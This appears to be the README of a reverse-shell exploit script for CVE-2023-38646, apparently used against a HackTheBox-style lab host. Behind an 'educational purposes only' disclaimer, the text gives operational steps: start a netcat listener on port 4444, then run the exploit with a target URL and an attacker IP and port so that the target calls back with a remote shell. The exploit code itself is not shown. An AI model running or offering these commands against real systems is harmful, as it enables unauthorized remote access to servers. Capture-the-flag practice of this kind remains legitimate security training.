
⚠️ For educational and authorized security research purposes only
Very grateful to the original PoC author securezeron
Set Up the Listener on your attacker machine:
nc -nlvp 4444
Then, run this command:
python3 CVE-2023-38646-Reverse-Shell.py -h
python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
